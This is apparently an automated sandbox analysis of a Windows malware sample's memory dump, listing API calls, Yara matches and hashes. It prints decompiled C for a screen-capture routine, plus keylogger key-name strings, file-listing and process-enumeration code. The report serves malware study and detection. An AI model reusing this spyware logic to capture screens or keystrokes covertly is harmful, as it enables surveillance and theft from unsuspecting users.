                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?), ref: 0040BD06
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD25
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD2E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD37
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BD10
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040BD4C
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,004107A8), ref: 0040BD65
                                          • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040BD6C
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040BD79
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BD97
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDA1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDAA
                                          • FindNextFileW.KERNEL32(?,?), ref: 0040BDC0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040BDD5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 0040BDE4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040BDF0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BDF9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE02
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,fileslist,00415268,?,00415268,?), ref: 0040BE31
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040BE3E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040BE4B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040BE55
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE6A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE73
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE85
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE8E
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040BE97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@$??0?$basic_string@G@2@@std@@V10@0@$D@1@@V01@@$?c_str@?$basic_string@$??4?$basic_string@?length@?$basic_string@FileFindV01@V10@@$??9std@@FirstG@1@@G@2@@0@Next
                                          • String ID: P)?$err_notopendir$fileslist
                                          • API String ID: 1112994111-4220216450
                                          • Opcode ID: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                                          • Instruction ID: 305903b0592b6c70fea0d48260eb7629651e495e35dfa161c8be6dc2ead5f216
                                          • Opcode Fuzzy Hash: 79c9baee2965a832a462d8af47ffc6020858f19acde58111eb033dc6fc779f9d
                                          • Instruction Fuzzy Hash: 7B51AE7290010EABCB04EBA0DD49DDE7B7CEF55305F044176F606E2190EF789A99CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,774273F0,?), ref: 00404677
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410854,?), ref: 00404C01
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410834,?,?,?,?,00000001), ref: 00404D53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                          • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up] $s8@
                                          • API String ID: 4257247948-2145460947
                                          • Opcode ID: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                                          • Instruction ID: 6621d6dcba6f39f3780b877212494eafe7300683ab97f71c5a1edef2570af96d
                                          • Opcode Fuzzy Hash: 6bbf6ec999e19eb7867b1fa4a36c1815a98bb4653b43f698e8fc3cbebbd7f826
                                          • Instruction Fuzzy Hash: 3F32C4E2608009BBEB04B5ACC996DFF763DD6C1340B50096BEA02B31C5F97A994456EB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 32%
                                          			E0040D71E(intOrPtr _a4) {
                                          				char _v5;
                                          				struct HDC__* _v12;
                                          				int _v16;
                                          				struct HBITMAP__* _v20;
                                          				struct HDC__* _v24;
                                          				intOrPtr _v30;
                                          				short _v32;
                                          				short _v34;
                                          				intOrPtr _v38;
                                          				char _v40;
                                          				char _v56;
                                          				char _v72;
                                          				signed int _v78;
                                          				signed int _v80;
                                          				long _v88;
                                          				long _v92;
                                          				void _v96;
                                          				void* _t86;
                                          				signed int _t92;
                                          				signed int _t93;
                                          				long _t105;
                                          				char* _t126;
                                          				signed int _t127;
                                          				struct HDC__* _t129;
                                          				signed short _t130;
                                          				void* _t131;
                                          				signed int _t133;
                                          				int _t154;
                                          				struct tagBITMAPINFO* _t155;
                                          
                                          				_t129 = CreateDCA("DISPLAY", 0, 0, 0);
                                          				_v24 = _t129;
                                          				_v12 = CreateCompatibleDC(_t129);
                                          				_v16 = GetDeviceCaps(_t129, 8);
                                          				_t154 = GetDeviceCaps(_t129, 0xa);
                                          				_t86 = CreateCompatibleBitmap(_t129, _v16, _t154);
                                          				_v20 = _t86;
                                          				if(_t86 != 0) {
                                          					_t7 =  &_v12; // 0x415940
                                          					if(SelectObject( *_t7, _t86) != 0) {
                                          						if(StretchBlt(_v12, 0, 0, _v16, _t154, _t129, 0, 0, _v16, _t154, 0xcc0020) != 0) {
                                          							if(GetObjectA(_v20, 0x18,  &_v96) != 0) {
                                          								_t92 = _v78 * _v80;
                                          								if(_t92 != 1) {
                                          									_t130 = 4;
                                          									if(_t92 <= _t130) {
                                          										goto L21;
                                          									} else {
                                          										_t130 = 8;
                                          										if(_t92 <= _t130) {
                                          											goto L21;
                                          										} else {
                                          											_t130 = 0x10;
                                          											if(_t92 <= _t130) {
                                          												goto L21;
                                          											} else {
                                          												if(_t92 > 0x18) {
                                          													_push(0x20);
                                          													goto L20;
                                          												} else {
                                          													_t130 = 0x18;
                                          													_push(0x28);
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									_push(1);
                                          									L20:
                                          									_pop(_t130);
                                          									L21:
                                          									_t93 = 1;
                                          									_push(0x28 + (_t93 << _t130) * 4);
                                          								}
                                          								_t155 = LocalAlloc(0x40, ??);
                                          								_t155->bmiHeader = 0x28;
                                          								_t155->bmiHeader.biWidth = _v92;
                                          								_t155->bmiHeader.biHeight = _v88;
                                          								_t155->bmiHeader.biPlanes = _v80;
                                          								_t155->bmiHeader.biBitCount = _v78;
                                          								if(_t130 < 0x18) {
                                          									_t127 = 1;
                                          									_t155->bmiHeader.biClrUsed = _t127 << _t130;
                                          								}
                                          								_t133 = 8;
                                          								asm("cdq");
                                          								_t155->bmiHeader.biCompression = 0;
                                          								_t155->bmiHeader.biClrImportant = 0;
                                          								_t105 = (_t155->bmiHeader.biWidth + 7) / _t133 * (_t130 & 0x0000ffff) * _t155->bmiHeader.biHeight;
                                          								_t155->bmiHeader.biSizeImage = _t105;
                                          								_t131 = GlobalAlloc(0, _t105);
                                          								if(_t131 != 0) {
                                          									if(GetDIBits(_v12, _v20, 0, _t155->bmiHeader.biHeight & 0x0000ffff, _t131, _t155, 0) != 0) {
                                          										_v40 = 0x4d42;
                                          										_v34 = 0;
                                          										_v32 = 0;
                                          										_v38 = _t155->bmiHeader.biSizeImage + _t155->bmiHeader.biClrUsed * 4 + _t155->bmiHeader + 0xe;
                                          										_v30 = _t155->bmiHeader + 0xe + _t155->bmiHeader.biClrUsed * 4;
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          										__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v40, 0xe);
                                          										__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v56);
                                          										__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t155, 0x28);
                                          										__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v56);
                                          										__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t131, _t155->bmiHeader.biSizeImage);
                                          										__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v56);
                                          										DeleteObject(_v20);
                                          										GlobalFree(_t131);
                                          										DeleteDC(_v24);
                                          										DeleteDC(_v12);
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v72);
                                          										__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          										__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									} else {
                                          										_t126 =  &_v5;
                                          										goto L24;
                                          									}
                                          								} else {
                                          									_t126 =  &_v5;
                                          									goto L24;
                                          								}
                                          							} else {
                                          								_t126 =  &_v5;
                                          								goto L24;
                                          							}
                                          						} else {
                                          							_t126 =  &_v5;
                                          							goto L24;
                                          						}
                                          					} else {
                                          						_t126 =  &_v5;
                                          						goto L24;
                                          					}
                                          				} else {
                                          					_t126 =  &_v5;
                                          					L24:
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0, _t126);
                                          				}
                                          				return _a4;
                                          			}
































                                          0x0040d737
                                          0x0040d73a
                                          0x0040d74c
                                          0x0040d754
                                          0x0040d759
                                          0x0040d760
                                          0x0040d768
                                          0x0040d76b
                                          0x0040d776
                                          0x0040d781
                                          0x0040d7a8
                                          0x0040d7c3
                                          0x0040d7d0
                                          0x0040d7d8
                                          0x0040d7e3
                                          0x0040d7e7
                                          0x00000000
                                          0x0040d7ed
                                          0x0040d7ef
                                          0x0040d7f3
                                          0x00000000
                                          0x0040d7f9
                                          0x0040d7fb
                                          0x0040d7ff
                                          0x00000000
                                          0x0040d801
                                          0x0040d805
                                          0x0040d87a
                                          0x00000000
                                          0x0040d807
                                          0x0040d809
                                          0x0040d80a
                                          0x0040d80a
                                          0x0040d805
                                          0x0040d7ff
                                          0x0040d7f3
                                          0x0040d7da
                                          0x0040d7da
                                          0x0040d87c
                                          0x0040d87c
                                          0x0040d87d
                                          0x0040d881
                                          0x0040d88b
                                          0x0040d88b
                                          0x0040d814
                                          0x0040d81a
                                          0x0040d823
                                          0x0040d829
                                          0x0040d830
                                          0x0040d838
                                          0x0040d83c
                                          0x0040d842
                                          0x0040d845
                                          0x0040d845
                                          0x0040d850
                                          0x0040d851
                                          0x0040d857
                                          0x0040d85a
                                          0x0040d860
                                          0x0040d866
                                          0x0040d86f
                                          0x0040d873
                                          0x0040d8a8
                                          0x0040d8bd
                                          0x0040d8ce
                                          0x0040d8d2
                                          0x0040d8da
                                          0x0040d8e9
                                          0x0040d8f0
                                          0x0040d8fd
                                          0x0040d90c
                                          0x0040d919
                                          0x0040d925
                                          0x0040d932
                                          0x0040d93f
                                          0x0040d94c
                                          0x0040d955
                                          0x0040d95c
                                          0x0040d96b
                                          0x0040d970
                                          0x0040d979
                                          0x0040d982
                                          0x0040d98b
                                          0x0040d8aa
                                          0x0040d8aa
                                          0x00000000
                                          0x0040d8aa
                                          0x0040d875
                                          0x0040d875
                                          0x00000000
                                          0x0040d875
                                          0x0040d7c5
                                          0x0040d7c5
                                          0x00000000
                                          0x0040d7c5
                                          0x0040d7aa
                                          0x0040d7aa
                                          0x00000000
                                          0x0040d7aa
                                          0x0040d783
                                          0x0040d783
                                          0x00000000
                                          0x0040d783
                                          0x0040d76d
                                          0x0040d76d
                                          0x0040d8ad
                                          0x0040d8b2
                                          0x0040d8b2
                                          0x0040d998

                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                                          • CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                                          • CreateCompatibleBitmap.GDI32(00000000,74B06490,00000000), ref: 0040D760
                                          • SelectObject.GDI32(@YA,00000000), ref: 0040D779
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8F0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8FD
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E,?,00000000), ref: 0040D90C
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D919
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028,?,00000000), ref: 0040D925
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D932
                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D93F
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D94C
                                          • DeleteObject.GDI32(?), ref: 0040D955
                                          • GlobalFree.KERNEL32 ref: 0040D95C
                                          • DeleteDC.GDI32(?), ref: 0040D96B
                                          • DeleteDC.GDI32(?), ref: 0040D970
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D979
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D982
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D98B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@V01@@$?assign@?$basic_string@CreateD@1@@DeleteV01@V12@Y?$basic_string@$??1?$basic_string@CapsCompatibleDeviceObject$BitmapFreeGlobalSelect
                                          • String ID: @YA$DISPLAY
                                          • API String ID: 2042352699-3806539182
                                          • Opcode ID: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                                          • Instruction ID: 01507db8c7ea154ffe35bb8a62b7e06070cb60eb7de7f760769c3134c364176c
                                          • Opcode Fuzzy Hash: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                                          • Instruction Fuzzy Hash: 3F813E75900209AFDB10DFA1DC88EDEBBB8FF48700F10842AF556E7190E775AA49CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004081C8
                                            • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                                            • Part of subcall function 0040F0B5: IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004081DC
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 004081F5
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00408202
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415268,00000002,00000000), ref: 00408223
                                            • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                                            • Part of subcall function 0040F0DF: IsWow64Process.KERNEL32(00000000,?,?,00407F70,?), ref: 0040F100
                                            • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                            • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                            • Part of subcall function 0040F16A: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040F17D
                                            • Part of subcall function 0040F16A: GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0040F192
                                            • Part of subcall function 0040F16A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040F1B5
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 0040829E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082AE
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082BB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158), ref: 004082CB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411158,00000000), ref: 004082D8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004082E8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082F5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00408305
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408311
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040831D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408326
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408332
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040833B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408347
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408350
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040835C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408365
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040836E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040837A
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408386
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408392
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040839E
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083A7
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 004083B5
                                          • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 004083C4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004083D1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004083DA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$Process$V10@V10@0@$D@1@@Process32V01@@$?c_str@?$basic_string@?length@?$basic_string@G@1@@NextOpenWow64$??4?$basic_string@CloseCreateCurrentFileFirstHandleModuleNameSnapshotToolhelp32V01@_itoa
                                          • String ID:
                                          • API String ID: 2310449240-0
